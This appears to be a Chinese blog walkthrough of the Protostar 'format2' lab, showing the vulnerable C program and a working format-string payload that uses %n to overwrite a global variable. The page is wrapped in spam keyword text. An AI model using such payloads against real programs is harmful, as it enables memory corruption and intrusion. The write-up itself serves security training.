91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Protostar format2

發布時間:2020-07-07 15:06:38 來源:網絡 閱讀:507 作者:terrying 欄目:安全技術
This level moves on from format1 and shows how specific values can be written in memory.
This level is at /opt/protostar/bin/format2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if(target == 64) {
    printf("you have modified the target :)\n");
} else {
    printf("target is %d :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

這題與上題有點區別:1、傳參改為fgets;2、target=64
同樣需要找到target的位置
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g         O .bss     00000004                            target

同樣先找出賦值動作的位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa"+"%x."*150' | ./format2
aaaaaaaa200.b7fd8420.bffff624.61616161.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4.80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626.
target is 0 :(

nice,這次很近。同樣確認一下位置:
user@protostar:/opt/protostar/bin$ python -c 'print "aaaaaaaa%x%x%x%x"' | ./format2
aaaaaaaa200b7fd8420bffff62461616161
target is 0 :(
按照上一題的做法看看會發生什么事情 :
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%x%x%x%n"' | ./format2
aaaa200b7fd8420bffff624
target is 27 :(
OK,這里已經成功更改了target的值了,題目要求是64,只需要將%x固定長度輸出即可:
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08aaaa%40x%x%x%n"' | ./format2
aaaa                                                                         200b7fd8420bffff624
you have modified the target :)




向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

乌兰察布市| 大洼县| 梁平县| 凤山市| 鄂托克旗| 项城市| 忻城县| 马龙县| 宜阳县| 恭城| 沈丘县| 灵台县| 永安市| 左权县| 石首市| 泸定县| 鸡东县| 安岳县| 潞西市| 西丰县| 汝南县| 东方市| 台东县| 包头市| 潜山县| 睢宁县| 颍上县| 遂昌县| 钟祥市| 拜城县| 深州市| 柳林县| 文水县| 荔浦县| 怀安县| 舞阳县| 绥芬河市| 滦平县| 江津市| 新邵县| 曲沃县|